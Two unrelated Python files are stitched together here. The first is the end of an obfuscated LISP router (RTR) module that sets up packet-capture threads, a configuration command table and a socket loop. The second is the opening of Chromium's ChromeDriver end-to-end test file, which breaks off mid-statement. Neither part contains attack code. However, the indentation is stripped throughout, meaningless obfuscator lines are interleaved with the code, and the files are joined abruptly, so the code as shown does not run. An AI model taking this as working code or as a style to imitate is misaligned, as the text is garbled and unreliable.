if 94 - 94: iII111i - Oo0Ooo + oO0o
if ( lisp . lisp_is_raspbian ( ) == False ) :
Ii1IIii11 = socket . socket ( socket . AF_INET6 , socket . SOCK_RAW ,
socket . IPPROTO_UDP )
if 59 - 59: I11i . I1IiiI - iIii1I11I1II1 + iIii1I11I1II1
if 56 - 56: oO0o + ooOoO0o
Ii1Ii1 = os . getenv ( "LISP_PCAP_THREADS" )
Ii1Ii1 = 1 if ( Ii1Ii1 == None ) else int ( Ii1Ii1 )
ii1IiI11I = os . getenv ( "LISP_WORKER_THREADS" )
ii1IiI11I = 0 if ( ii1IiI11I == None ) else int ( ii1IiI11I )
if 90 - 90: o0oOOo0O0Ooo % oO0o % i11iIiiIii . OOooOOo % OOooOOo
if 36 - 36: Oo0Ooo % Ii1I / i11iIiiIii % I1Ii111 + OoO0O00
if 23 - 23: II111iiii
if 93 - 93: oO0o . I11i / i1IIi
for i11ii in range ( Ii1Ii1 ) :
oOOOOO0Ooooo = lisp . lisp_thread ( "pcap-{}" . format ( i11ii ) )
oOOOOO0Ooooo . thread_number = i11ii
oOOOOO0Ooooo . number_of_pcap_threads = Ii1Ii1
oOOOOO0Ooooo . number_of_worker_threads = ii1IiI11I
I11 . append ( oOOOOO0Ooooo )
threading . Thread ( target = i1i1IiIi1 , args = [ oOOOOO0Ooooo ] ) . start ( )
if 57 - 57: Ii1I - OoooooooOO
if 68 - 68: o0oOOo0O0Ooo % I1ii11iIi11i / I1Ii111 + I1Ii111 - I1Ii111 . OoO0O00
if 100 - 100: OoOoOO00 % Oo0Ooo
if 76 - 76: II111iiii / OoO0O00 + OoooooooOO . I1ii11iIi11i . I11i . ooOoO0o
if 43 - 43: i1IIi
if 17 - 17: O0 - OoOoOO00
for i11ii in range ( ii1IiI11I ) :
oOOOOO0Ooooo = lisp . lisp_thread ( "worker-{}" . format ( i11ii ) )
I11 . append ( oOOOOO0Ooooo )
threading . Thread ( target = I1I1iII1i , args = [ oOOOOO0Ooooo ] ) . start ( )
if 81 - 81: I1IiiI - iIii1I11I1II1 / I1IiiI / O0
if 34 - 34: Ii1I * Ii1I - I1ii11iIi11i - O0 . i11iIiiIii
if 32 - 32: iIii1I11I1II1 . OoO0O00 * oO0o / OOooOOo . II111iiii - Oo0Ooo
if 10 - 10: I1ii11iIi11i / i11iIiiIii - Ii1I + oO0o * I1IiiI
if 94 - 94: I1IiiI + iIii1I11I1II1 / O0 - OoooooooOO % I1ii11iIi11i
lisp . lisp_load_checkpoint ( )
if 64 - 64: I11i + OoO0O00
if 25 - 25: I1IiiI . ooOoO0o + I1IiiI % Ii1I * iIii1I11I1II1
if 31 - 31: i11iIiiIii + OOooOOo - O0
if 51 - 51: OoO0O00 * i1IIi / Ii1I * OOooOOo + ooOoO0o % I1ii11iIi11i
lisp . lisp_load_split_pings = ( os . getenv ( "LISP_LOAD_SPLIT_PINGS" ) != None )
if 34 - 34: oO0o * OoooooooOO + Ii1I + i11iIiiIii
if 22 - 22: i1IIi
if 24 - 24: I11i / I1IiiI * i1IIi % OoooooooOO
if 99 - 99: i11iIiiIii . II111iiii . OoooooooOO
Oooo0000 = threading . Timer ( 60 , ii1II1II ,
[ OOo ] )
Oooo0000 . start ( )
return ( True )
if 59 - 59: i11iIiiIii . OoooooooOO / I11i * I1ii11iIi11i + OoooooooOO
if 3 - 3: i11iIiiIii * Oo0Ooo % iIii1I11I1II1 % I1IiiI * iII111i / OOooOOo
if 95 - 95: IiII * O0 * I1Ii111 . OoooooooOO % Oo0Ooo + I1ii11iIi11i
if 98 - 98: oO0o . OoooooooOO
if 54 - 54: O0 / IiII % ooOoO0o * i1IIi * O0
if 48 - 48: o0oOOo0O0Ooo . oO0o % OoOoOO00 - OoOoOO00
if 33 - 33: I11i % II111iiii + OoO0O00
def OoIi1I1I ( ) :
if 56 - 56: O0
if 45 - 45: OoOoOO00 - OoO0O00 - OoOoOO00
if 41 - 41: Oo0Ooo / i1IIi / Oo0Ooo - iII111i . o0oOOo0O0Ooo
if 65 - 65: O0 * i11iIiiIii . OoooooooOO / I1IiiI / iII111i
lisp . lisp_close_socket ( II1iII1i [ 0 ] , "" )
lisp . lisp_close_socket ( II1iII1i [ 1 ] , "" )
lisp . lisp_close_socket ( Oo0oO0oo0oO00 , "lisp-rtr" )
lisp . lisp_close_socket ( II1Ii1iI1i , "" )
lisp . lisp_close_socket ( oO0oIIII , "" )
lisp . lisp_close_socket ( i111I , "lispers.net-itr" )
OOo . close ( )
return
if 69 - 69: ooOoO0o % ooOoO0o
if 76 - 76: i11iIiiIii * iII111i / OoO0O00 % I1ii11iIi11i + OOooOOo
if 48 - 48: iIii1I11I1II1 % i1IIi + OoOoOO00 % o0oOOo0O0Ooo
if 79 - 79: OoOoOO00 % I1IiiI % Ii1I / i1IIi % OoO0O00
if 56 - 56: iIii1I11I1II1 - i11iIiiIii * iII111i
if 84 - 84: OOooOOo + Ii1I + o0oOOo0O0Ooo
if 33 - 33: Ii1I
def ooOOO00oOOooO ( kv_pair ) :
global II1iII1i
global iiI1iIiI
if 46 - 46: iIii1I11I1II1 . i11iIiiIii - OoOoOO00 % O0 / II111iiii * i1IIi
lispconfig . lisp_map_resolver_command ( kv_pair )
if 66 - 66: O0
if ( lisp . lisp_test_mr_timer == None or
lisp . lisp_test_mr_timer . is_alive ( ) == False ) :
lisp . lisp_test_mr_timer = threading . Timer ( 2 , lisp . lisp_test_mr ,
[ II1iII1i , iiI1iIiI ] )
lisp . lisp_test_mr_timer . start ( )
if 52 - 52: OoO0O00 * OoooooooOO
return
if 12 - 12: O0 + IiII * i1IIi . OoO0O00
if 71 - 71: I1Ii111 - o0oOOo0O0Ooo - OOooOOo
if 28 - 28: iIii1I11I1II1
if 7 - 7: o0oOOo0O0Ooo % IiII * OoOoOO00
if 58 - 58: IiII / I11i + II111iiii % iII111i - OoooooooOO
if 25 - 25: OoOoOO00 % OoooooooOO * Oo0Ooo - i1IIi * II111iiii * oO0o
if 30 - 30: I11i % OoOoOO00 / I1ii11iIi11i * O0 * Ii1I . I1IiiI
if 46 - 46: OoOoOO00 - O0
def O00Ooo ( kv_pair ) :
global II1Ii1iI1i , OOo , iiI1iIiI
if 92 - 92: OoOoOO00 % O0
oo00ooooOOo00 = lisp . lisp_rloc_probing
if 16 - 16: i11iIiiIii / i1IIi % OOooOOo
if 84 - 84: I11i - Oo0Ooo * O0 / Ii1I . Ii1I
if 93 - 93: O0 / ooOoO0o + I1IiiI
if 20 - 20: IiII / iII111i % OoooooooOO / iIii1I11I1II1 + I1IiiI
lispconfig . lisp_xtr_command ( kv_pair )
if 57 - 57: o0oOOo0O0Ooo / I1Ii111
if 13 - 13: OoooooooOO + OoO0O00
if 32 - 32: O0 + oO0o % Oo0Ooo
if 7 - 7: I1ii11iIi11i / ooOoO0o
if 11 - 11: IiII * ooOoO0o / ooOoO0o - OOooOOo
if ( oo00ooooOOo00 == False and lisp . lisp_rloc_probing ) :
i1I = [ II1Ii1iI1i , II1Ii1iI1i ,
None , OOo ]
lisp . lisp_start_rloc_probe_timer ( 1 , i1I )
oO0Oo = { "type" : "itr-crypto-port" , "port" : iiI1iIiI }
lisp . lisp_write_to_dp_socket ( oO0Oo )
if 68 - 68: I1IiiI % IiII - IiII / I1IiiI + I1ii11iIi11i - Oo0Ooo
if 65 - 65: ooOoO0o - i1IIi
if 62 - 62: I11i / oO0o % Oo0Ooo . OoooooooOO / i11iIiiIii / I1Ii111
if 60 - 60: I1IiiI % oO0o / o0oOOo0O0Ooo % oO0o * i11iIiiIii / iII111i
if 34 - 34: I1Ii111 - OOooOOo
lisp . lisp_ipc_write_xtr_parameters ( lisp . lisp_debug_logging ,
lisp . lisp_data_plane_logging )
return
if 25 - 25: oO0o % I1IiiI + i11iIiiIii + O0 * OoooooooOO
if 64 - 64: i1IIi
if 10 - 10: I1Ii111 % O0 / I1IiiI % I11i
if 25 - 25: II111iiii / OoO0O00
if 64 - 64: O0 % ooOoO0o
iI1111i = {
"lisp xtr-parameters" : [ O00Ooo , {
"rloc-probing" : [ True , "yes" , "no" ] ,
"nonce-echoing" : [ True , "yes" , "no" ] ,
"data-plane-security" : [ True , "yes" , "no" ] ,
"data-plane-logging" : [ True , "yes" , "no" ] ,
"frame-logging" : [ True , "yes" , "no" ] ,
"flow-logging" : [ True , "yes" , "no" ] ,
"nat-traversal" : [ True , "yes" , "no" ] ,
"checkpoint-map-cache" : [ True , "yes" , "no" ] ,
"ipc-data-plane" : [ True , "yes" , "no" ] ,
"decentralized-push-xtr" : [ True , "yes" , "no" ] ,
"decentralized-pull-xtr-modulus" : [ True , 1 , 0xff ] ,
"decentralized-pull-xtr-dns-suffix" : [ True ] ,
"register-reachable-rtrs" : [ True , "yes" , "no" ] ,
"program-hardware" : [ True , "yes" , "no" ] } ] ,
"lisp interface" : [ lispconfig . lisp_interface_command , {
"interface-name" : [ True ] ,
"device" : [ True ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"dynamic-eid" : [ True ] ,
"dynamic-eid-device" : [ True ] ,
"lisp-nat" : [ True , "yes" , "no" ] ,
"dynamic-eid-timeout" : [ True , 0 , 0xff ] } ] ,
"lisp map-resolver" : [ ooOOO00oOOooO , {
"mr-name" : [ True ] ,
"ms-name" : [ True ] ,
"dns-name" : [ True ] ,
"address" : [ True ] } ] ,
"lisp map-cache" : [ lispconfig . lisp_map_cache_command , {
"prefix" : [ ] ,
"mr-name" : [ True ] ,
"ms-name" : [ True ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"eid-prefix" : [ True ] ,
"group-prefix" : [ True ] ,
"send-map-request" : [ True , "yes" , "no" ] ,
"rloc" : [ ] ,
"rloc-record-name" : [ True ] ,
"rle-name" : [ True ] ,
"elp-name" : [ True ] ,
"address" : [ True ] ,
"priority" : [ True , 0 , 255 ] ,
"weight" : [ True , 0 , 100 ] } ] ,
"lisp rtr-map-cache" : [ lispconfig . lisp_map_cache_command , {
"prefix" : [ ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"eid-prefix" : [ True ] ,
"group-prefix" : [ True ] ,
"rloc" : [ ] ,
"rloc-record-name" : [ True ] ,
"rle-name" : [ True ] ,
"elp-name" : [ True ] ,
"address" : [ True ] ,
"priority" : [ True , 0 , 255 ] ,
"weight" : [ True , 0 , 100 ] } ] ,
"lisp explicit-locator-path" : [ lispconfig . lisp_elp_command , {
"elp-name" : [ False ] ,
"elp-node" : [ ] ,
"address" : [ True ] ,
"probe" : [ True , "yes" , "no" ] ,
"strict" : [ True , "yes" , "no" ] ,
"eid" : [ True , "yes" , "no" ] } ] ,
"lisp replication-list-entry" : [ lispconfig . lisp_rle_command , {
"rle-name" : [ False ] ,
"rle-node" : [ ] ,
"address" : [ True ] ,
"level" : [ True , 0 , 255 ] } ] ,
"lisp json" : [ lispconfig . lisp_json_command , {
"json-name" : [ False ] ,
"json-string" : [ False ] } ] ,
"lisp database-mapping" : [ i11 , {
"prefix" : [ ] ,
"mr-name" : [ True ] ,
"ms-name" : [ True ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"secondary-instance-id" : [ True , 0 , 0xffffffff ] ,
"eid-prefix" : [ True ] ,
"group-prefix" : [ True ] ,
"dynamic-eid" : [ True , "yes" , "no" ] ,
"signature-eid" : [ True , "yes" , "no" ] ,
"rloc" : [ ] ,
"rloc-record-name" : [ True ] ,
"elp-name" : [ True ] ,
"geo-name" : [ True ] ,
"rle-name" : [ True ] ,
"json-name" : [ True ] ,
"address" : [ True ] ,
"interface" : [ True ] ,
"priority" : [ True , 0 , 255 ] ,
"weight" : [ True , 0 , 100 ] } ] ,
"lisp glean-mapping" : [ O0O0O , {
"instance-id" : [ False ] ,
"eid-prefix" : [ True ] ,
"group-prefix" : [ True ] ,
"rloc-prefix" : [ True ] ,
"rloc-probe" : [ True , "yes" , "no" ] ,
"igmp-query" : [ True , "yes" , "no" ] } ] ,
"show rtr-rloc-probing" : [ iiI1I11i1i , { } ] ,
"show rtr-keys" : [ o00oOO0 , { } ] ,
"show rtr-map-cache" : [ O00oooo0O , { } ] ,
"show rtr-map-cache-dns" : [ Ii1IOo0o0 , { } ]
}
if 39 - 39: I1Ii111 % OoooooooOO - II111iiii % OoOoOO00 + oO0o + O0
if 14 - 14: OoooooooOO . o0oOOo0O0Ooo . I11i
if 50 - 50: ooOoO0o * OoOoOO00 + I1ii11iIi11i - i11iIiiIii + Oo0Ooo * I1ii11iIi11i
if 20 - 20: I1Ii111 / o0oOOo0O0Ooo % OoOoOO00
if 69 - 69: I1Ii111 - i1IIi % iII111i . OOooOOo - OOooOOo
if 65 - 65: OOooOOo + II111iiii
def Oo0O0OO0OoO0 ( lisp_socket ) :
if 26 - 26: OOooOOo * Oo0Ooo
if 31 - 31: I11i * oO0o . Ii1I
if 35 - 35: I11i
if 94 - 94: ooOoO0o / i11iIiiIii % O0
O0oO0oo0O , OOOo , OoOO , Ooooo00o0OoO = lisp . lisp_receive ( lisp_socket , False )
oo = lisp . lisp_trace ( )
if ( oo . decode ( Ooooo00o0OoO ) == False ) : return
if 76 - 76: OoO0O00 * oO0o
if 63 - 63: II111iiii . II111iiii + I1ii11iIi11i + OOooOOo + O0 . Ii1I
if 1 - 1: O0 * i11iIiiIii - ooOoO0o - Ii1I
if 94 - 94: OoO0O00 + IiII + ooOoO0o
if 82 - 82: Oo0Ooo - Oo0Ooo . iIii1I11I1II1 / OOooOOo + IiII % iIii1I11I1II1
oo . rtr_cache_nat_trace ( OOOo , OoOO )
if 61 - 61: OOooOOo / Oo0Ooo % OOooOOo - OoO0O00 + ooOoO0o / ooOoO0o
if 82 - 82: Oo0Ooo
if 5 - 5: OoO0O00 / OoO0O00 - O0 - I1Ii111 + I1Ii111
if 99 - 99: I11i * OoooooooOO / o0oOOo0O0Ooo . IiII - iIii1I11I1II1 - Ii1I
if 31 - 31: IiII - OoO0O00 / OOooOOo . i1IIi / Ii1I
if 66 - 66: OoO0O00
if 72 - 72: I1Ii111
if ( iIIi1Ii1III ( ) == False ) :
lisp . lprint ( "lisp_rtr_startup() failed" )
lisp . lisp_print_banner ( "RTR abnormal exit" )
exit ( 1 )
if 91 - 91: II111iiii / IiII + iIii1I11I1II1 . I11i - O0
if 70 - 70: Ii1I * oO0o - I11i + Oo0Ooo % I1ii11iIi11i - IiII
oooOoO00OooO0 = [ II1Ii1iI1i , Oo0oO0oo0oO00 ,
i111I , oO0oIIII ]
o00OOo = [ II1Ii1iI1i ] * 3
if 40 - 40: iIii1I11I1II1 + iII111i * OoOoOO00 + oO0o
while ( True ) :
try : I1Ii1i11I1I , oo0o000o0oOO0 , i1I11IiI1iiII = select . select ( oooOoO00OooO0 , [ ] , [ ] )
except : break
if 66 - 66: o0oOOo0O0Ooo * OOooOOo + Ii1I * o0oOOo0O0Ooo + OOooOOo / OoooooooOO
if 86 - 86: Ii1I . iII111i - iII111i
if 71 - 71: iIii1I11I1II1 . II111iiii % iIii1I11I1II1
if 22 - 22: i11iIiiIii % I1ii11iIi11i % ooOoO0o % ooOoO0o . OoO0O00
if ( lisp . lisp_ipc_data_plane and i111I in I1Ii1i11I1I ) :
lisp . lisp_process_punt ( i111I , II1iII1i ,
iiI1iIiI )
if 85 - 85: ooOoO0o . O0 / OOooOOo * ooOoO0o - OoO0O00 - i11iIiiIii
if 25 - 25: ooOoO0o % Oo0Ooo - OOooOOo
if 80 - 80: IiII % II111iiii - Oo0Ooo - iIii1I11I1II1
if 9 - 9: o0oOOo0O0Ooo % I1ii11iIi11i . I1ii11iIi11i
if 28 - 28: OoooooooOO % oO0o + I1ii11iIi11i + O0 . I1Ii111
if ( oO0oIIII in I1Ii1i11I1I ) :
Oo0O0OO0OoO0 ( oO0oIIII )
if 80 - 80: i11iIiiIii % I1ii11iIi11i
if 54 - 54: o0oOOo0O0Ooo + I11i - iIii1I11I1II1 % ooOoO0o % IiII
if 19 - 19: I1ii11iIi11i / iIii1I11I1II1 % i1IIi . OoooooooOO
if 57 - 57: ooOoO0o . Oo0Ooo - OoO0O00 - i11iIiiIii * I1Ii111 / o0oOOo0O0Ooo
if 79 - 79: I1ii11iIi11i + o0oOOo0O0Ooo % Oo0Ooo * o0oOOo0O0Ooo
if ( II1Ii1iI1i in I1Ii1i11I1I ) :
O0oO0oo0O , OOOo , OoOO , Ooooo00o0OoO = lisp . lisp_receive ( o00OOo [ 0 ] ,
False )
if ( OOOo == "" ) : break
if ( lisp . lisp_is_rloc_probe_request ( Ooooo00o0OoO [ 0 ] ) ) :
lisp . lprint ( "RTR ignoring RLOC-probe request, using pcap" )
continue
if 21 - 21: iII111i
if ( lisp . lisp_is_rloc_probe_reply ( Ooooo00o0OoO [ 0 ] ) ) :
lisp . lprint ( "RTR ignoring RLOC-probe reply, using pcap" )
continue
if 24 - 24: iII111i / ooOoO0o
lisp . lisp_parse_packet ( o00OOo , Ooooo00o0OoO , OOOo , OoOO )
if 61 - 61: iIii1I11I1II1 + oO0o
if 8 - 8: I1Ii111 + OoO0O00
if 9 - 9: OOooOOo + o0oOOo0O0Ooo
if 8 - 8: OOooOOo * Oo0Ooo / iII111i - OoO0O00 - OoooooooOO
if 100 - 100: oO0o . iIii1I11I1II1 . iIii1I11I1II1
if 55 - 55: oO0o
if ( Oo0oO0oo0oO00 in I1Ii1i11I1I ) :
O0oO0oo0O , OOOo , OoOO , Ooooo00o0OoO = lisp . lisp_receive ( Oo0oO0oo0oO00 , True )
if 37 - 37: IiII / i11iIiiIii / Oo0Ooo
if ( OOOo == "" ) : break
if 97 - 97: I1Ii111 . I11i / I1IiiI
if ( O0oO0oo0O == "command" ) :
if ( Ooooo00o0OoO == "clear" ) :
lisp . lisp_clear_map_cache ( )
continue
if 83 - 83: I11i - I1ii11iIi11i * oO0o
if ( Ooooo00o0OoO . find ( "clear%" ) != - 1 ) :
lispconfig . lisp_clear_decap_stats ( Ooooo00o0OoO )
continue
if 90 - 90: Oo0Ooo * I1IiiI
lispconfig . lisp_process_command ( Oo0oO0oo0oO00 , O0oO0oo0O ,
Ooooo00o0OoO , "lisp-rtr" , [ iI1111i ] )
elif ( O0oO0oo0O == "api" ) :
lisp . lisp_process_api ( "lisp-rtr" , Oo0oO0oo0oO00 , Ooooo00o0OoO )
elif ( O0oO0oo0O == "data-packet" ) :
IIIii ( Ooooo00o0OoO , "" )
else :
if ( lisp . lisp_is_rloc_probe_request ( Ooooo00o0OoO [ 0 ] ) ) :
lisp . lprint ( "RTR ignoring RLOC-probe request, using pcap" )
continue
if 75 - 75: I1ii11iIi11i - OoOoOO00 * i11iIiiIii . OoooooooOO - Oo0Ooo . I11i
if ( lisp . lisp_is_rloc_probe_reply ( Ooooo00o0OoO [ 0 ] ) ) :
lisp . lprint ( "RTR ignoring RLOC-probe reply, using pcap" )
continue
if 6 - 6: I11i * oO0o / OoooooooOO % Ii1I * o0oOOo0O0Ooo
lisp . lisp_parse_packet ( II1iII1i , Ooooo00o0OoO , OOOo , OoOO )
if 28 - 28: IiII * I1IiiI % IiII
if 95 - 95: O0 / I11i . I1Ii111
if 17 - 17: I11i
if 56 - 56: ooOoO0o * o0oOOo0O0Ooo + I11i
OoIi1I1I ( )
lisp . lisp_print_banner ( "RTR normal exit" )
exit ( 0 )
if 48 - 48: IiII * OoO0O00 % I1Ii111 - I11i
if 72 - 72: i1IIi % ooOoO0o % IiII % oO0o - oO0o
# dd678faae9ac167bc83abf78e5cb2f3f0688d3a3
|
run_py_tests.py | #!/usr/bin/env python
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""End to end tests for ChromeDriver."""
import base64
import json
import math
import optparse
import os
import socket
import subprocess
import sys
import tempfile
import threading
import time
import unittest
import urllib2
import shutil
_THIS_DIR = os.path.abspath(os.path.dirname(__file__))
sys.path.insert(1, os.path.join(_THIS_DIR, os.pardir))
sys.path.insert(1, os.path.join(_THIS_DIR, os.pardir, 'client'))
sys.path.insert(1, os.path.join(_THIS_DIR, os.pardir, 'server'))
import chrome_paths
import chromedriver
import unittest_util
import util
import server
from webelement import WebElement
import webserver
_TEST_DATA_DIR = os.path.join(chrome_paths.GetTestData(), 'chromedriver')
if util.IsLinux():
sys.path.insert(0, os.path.join(chrome_paths.GetSrc(), 'build', 'android'))
from pylib import android_commands
from pylib import constants
from pylib import forwarder
from pylib import valgrind_tools
from pylib.device import device_utils
_NEGATIVE_FILTER = [
# https://code.google.com/p/chromedriver/issues/detail?id=213
'ChromeDriverTest.testClickElementInSubFrame',
# This test is flaky since it uses setTimeout.
# Re-enable once crbug.com/177511 is fixed and we can remove setTimeout.
'ChromeDriverTest.testAlert',
]
_VERSION_SPECIFIC_FILTER = {}
_VERSION_SPECIFIC_FILTER['HEAD'] = [
# https://code.google.com/p/chromedriver/issues/detail?id=913
'ChromeDriverTest.testChromeDriverReceiveAndSendLargeData',
]
_VERSION_SPECIFIC_FILTER['37'] = [
# https://code.google.com/p/chromedriver/issues/detail?id=954
'MobileEmulationCapabilityTest.testClickElement',
'MobileEmulationCapabilityTest.testHoverOverElement',
'MobileEmulationCapabilityTest.testSingleTapElement',
]
_VERSION_SPECIFIC_FILTER['36'] = [
# https://code.google.com/p/chromedriver/issues/detail?id=954
'MobileEmulationCapabilityTest.testClickElement',
'MobileEmulationCapabilityTest.testHoverOverElement',
'MobileEmulationCapabilityTest.testSingleTapElement',
]
_OS_SPECIFIC_FILTER = {}
_OS_SPECIFIC_FILTER['win'] = [
# https://code.google.com/p/chromedriver/issues/detail?id=214
'ChromeDriverTest.testCloseWindow',
# https://code.google.com/p/chromedriver/issues/detail?id=299
'ChromeLogPathCapabilityTest.testChromeLogPath',
]
_OS_SPECIFIC_FILTER['linux'] = [
# Xvfb doesn't support maximization.
'ChromeDriverTest.testWindowMaximize',
# https://code.google.com/p/chromedriver/issues/detail?id=302
'ChromeDriverTest.testWindowPosition',
'ChromeDriverTest.testWindowSize',
]
_OS_SPECIFIC_FILTER['mac'] = [
# https://code.google.com/p/chromedriver/issues/detail?id=304
'ChromeDriverTest.testGoBackAndGoForward',
]
_DESKTOP_NEGATIVE_FILTER = [
# Desktop doesn't support touch (without --touch-events).
'ChromeDriverTest.testSingleTapElement',
'ChromeDriverTest.testTouchDownUpElement',
'ChromeDriverTest.testTouchFlickElement',
'ChromeDriverTest.testTouchMovedElement',
'ChromeDriverAndroidTest.*',
]
def _GetDesktopNegativeFilter(version_name):
filter = _NEGATIVE_FILTER + _DESKTOP_NEGATIVE_FILTER
os = util.GetPlatformName()
if os in _OS_SPECIFIC_FILTER:
filter += _OS_SPECIFIC_FILTER[os]
if version_name in _VERSION_SPECIFIC_FILTER:
filter += _VERSION_SPECIFIC_FILTER[version_name]
return filter
_ANDROID_NEGATIVE_FILTER = {}
_ANDROID_NEGATIVE_FILTER['chrome'] = (
_NEGATIVE_FILTER + [
# TODO(chrisgao): fix hang of tab crash test on android.
'ChromeDriverTest.testTabCrash',
# Android doesn't support switches and extensions.
'ChromeSwitchesCapabilityTest.*',
'ChromeExtensionsCapabilityTest.*',
'MobileEmulationCapabilityTest.*',
'ChromeDownloadDirTest.*',
# https://crbug.com/274650
'ChromeDriverTest.testCloseWindow',
# https://code.google.com/p/chromedriver/issues/detail?id=270
'ChromeDriverTest.testPopups',
# https://code.google.com/p/chromedriver/issues/detail?id=298
'ChromeDriverTest.testWindowPosition',
'ChromeDriverTest.testWindowSize',
'ChromeDriverTest.testWindowMaximize',
'ChromeLogPathCapabilityTest.testChromeLogPath',
'RemoteBrowserTest.*',
# Don't enable perf testing on Android yet.
'PerfTest.testSessionStartTime',
'PerfTest.testSessionStopTime',
'PerfTest.testColdExecuteScript',
# https://code.google.com/p/chromedriver/issues/detail?id=459
'ChromeDriverTest.testShouldHandleNewWindowLoadingProperly',
# https://code.google.com/p/chromedriver/issues/detail?id=913
'ChromeDriverTest.testChromeDriverReceiveAndSendLargeData',
]
)
_ANDROID_NEGATIVE_FILTER['chrome_stable'] = (
_ANDROID_NEGATIVE_FILTER['chrome'])
_ANDROID_NEGATIVE_FILTER['chrome_beta'] = (
_ANDROID_NEGATIVE_FILTER['chrome'])
_ANDROID_NEGATIVE_FILTER['chrome_shell'] = (
_ANDROID_NEGATIVE_FILTER['chrome'] + [
# ChromeShell doesn't support multiple tabs.
'ChromeDriverTest.testGetWindowHandles',
'ChromeDriverTest.testSwitchToWindow',
'ChromeDriverTest.testShouldHandleNewWindowLoadingProperly',
]
)
_ANDROID_NEGATIVE_FILTER['chromedriver_webview_shell'] = (
_ANDROID_NEGATIVE_FILTER['chrome_shell'] + [
# https://code.google.com/p/chromedriver/issues/detail?id=913
'ChromeDriverTest.testChromeDriverSendLargeData',
'PerformanceLoggerTest.testPerformanceLogger',
]
)
class ChromeDriverBaseTest(unittest.TestCase):
"""Base class for testing chromedriver functionalities."""
def __init__(self, *args, **kwargs):
super(ChromeDriverBaseTest, self).__init__(*args, **kwargs)
self._drivers = []
def tearDown(self):
for driver in self._drivers:
try:
driver.Quit()
except:
pass
def CreateDriver(self, server_url=None, download_dir=None, **kwargs):
if server_url is None:
server_url = _CHROMEDRIVER_SERVER_URL
android_package = None
android_activity = None
android_process = None
if _ANDROID_PACKAGE_KEY:
android_package = constants.PACKAGE_INFO[_ANDROID_PACKAGE_KEY].package
if _ANDROID_PACKAGE_KEY == 'chromedriver_webview_shell':
android_activity = constants.PACKAGE_INFO[_ANDROID_PACKAGE_KEY].activity
android_process = '%s:main' % android_package
driver = chromedriver.ChromeDriver(server_url,
chrome_binary=_CHROME_BINARY,
android_package=android_package,
android_activity=android_activity,
android_process=android_process,
download_dir=download_dir,
**kwargs)
self._drivers += [driver]
return driver
class ChromeDriverTest(ChromeDriverBaseTest):
"""End to end tests for ChromeDriver."""
@staticmethod
def GlobalSetUp():
ChromeDriverTest._http_server = webserver.WebServer(
chrome_paths.GetTestData())
ChromeDriverTest._sync_server = webserver.SyncWebServer()
if _ANDROID_PACKAGE_KEY:
ChromeDriverTest._device = device_utils.DeviceUtils(
android_commands.GetAttachedDevices()[0])
http_host_port = ChromeDriverTest._http_server._server.server_port
sync_host_port = ChromeDriverTest._sync_server._server.server_port
forwarder.Forwarder.Map(
[(http_host_port, http_host_port), (sync_host_port, sync_host_port)],
ChromeDriverTest._device)
@staticmethod
def GlobalTearDown():
if _ANDROID_PACKAGE_KEY:
forwarder.Forwarder.UnmapAllDevicePorts(ChromeDriverTest._device)
ChromeDriverTest._http_server.Shutdown()
@staticmethod
def GetHttpUrlForFile(file_path):
return ChromeDriverTest._http_server.GetUrl() + file_path
def setUp(self):
self._driver = self.CreateDriver()
def testStartStop(self):
pass
def testLoadUrl(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
def testGetCurrentWindowHandle(self):
self._driver.GetCurrentWindowHandle()
def _WaitForNewWindow(self, old_handles):
"""Wait for at least one new window to show up in 20 seconds.
Args:
old_handles: Handles to all old windows before the new window is added.
Returns:
Handle to a new window. None if timeout.
"""
deadline = time.time() + 20
while time.time() < deadline:
new_handles = self._driver.GetWindowHandles()
if len(new_handles) > len(old_handles):
for index, old_handle in enumerate(old_handles):
self.assertEquals(old_handle, new_handles[index])
return new_handles[len(old_handles)]
time.sleep(0.01)
return None
def testCloseWindow(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/page_test.html'))
old_handles = self._driver.GetWindowHandles()
self._driver.FindElement('id', 'link').Click()
new_window_handle = self._WaitForNewWindow(old_handles)
self.assertNotEqual(None, new_window_handle)
self._driver.SwitchToWindow(new_window_handle)
self.assertEquals(new_window_handle, self._driver.GetCurrentWindowHandle())
self.assertRaises(chromedriver.NoSuchElement,
self._driver.FindElement, 'id', 'link')
self._driver.CloseWindow()
self.assertRaises(chromedriver.NoSuchWindow,
self._driver.GetCurrentWindowHandle)
new_handles = self._driver.GetWindowHandles()
for old_handle in old_handles:
self.assertTrue(old_handle in new_handles)
for handle in new_handles:
self._driver.SwitchToWindow(handle)
self.assertEquals(handle, self._driver.GetCurrentWindowHandle())
self._driver.CloseWindow()
def testGetWindowHandles(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/page_test.html'))
old_handles = self._driver.GetWindowHandles()
self._driver.FindElement('id', 'link').Click()
self.assertNotEqual(None, self._WaitForNewWindow(old_handles))
def testSwitchToWindow(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/page_test.html'))
self.assertEquals(
1, self._driver.ExecuteScript('window.name = "oldWindow"; return 1;'))
window1_handle = self._driver.GetCurrentWindowHandle()
old_handles = self._driver.GetWindowHandles()
self._driver.FindElement('id', 'link').Click()
new_window_handle = self._WaitForNewWindow(old_handles)
self.assertNotEqual(None, new_window_handle)
self._driver.SwitchToWindow(new_window_handle)
self.assertEquals(new_window_handle, self._driver.GetCurrentWindowHandle())
self.assertRaises(chromedriver.NoSuchElement,
self._driver.FindElement, 'id', 'link')
self._driver.SwitchToWindow('oldWindow')
self.assertEquals(window1_handle, self._driver.GetCurrentWindowHandle())
def testEvaluateScript(self):
self.assertEquals(1, self._driver.ExecuteScript('return 1'))
self.assertEquals(None, self._driver.ExecuteScript(''))
def testEvaluateScriptWithArgs(self):
script = ('document.body.innerHTML = "<div>b</div><div>c</div>";'
'return {stuff: document.querySelectorAll("div")};')
stuff = self._driver.ExecuteScript(script)['stuff']
script = 'return arguments[0].innerHTML + arguments[1].innerHTML'
self.assertEquals(
'bc', self._driver.ExecuteScript(script, stuff[0], stuff[1]))
def testEvaluateInvalidScript(self):
self.assertRaises(chromedriver.ChromeDriverException,
self._driver.ExecuteScript, '{{{')
def testExecuteAsyncScript(self):
self._driver.SetTimeout('script', 3000)
self.assertRaises(
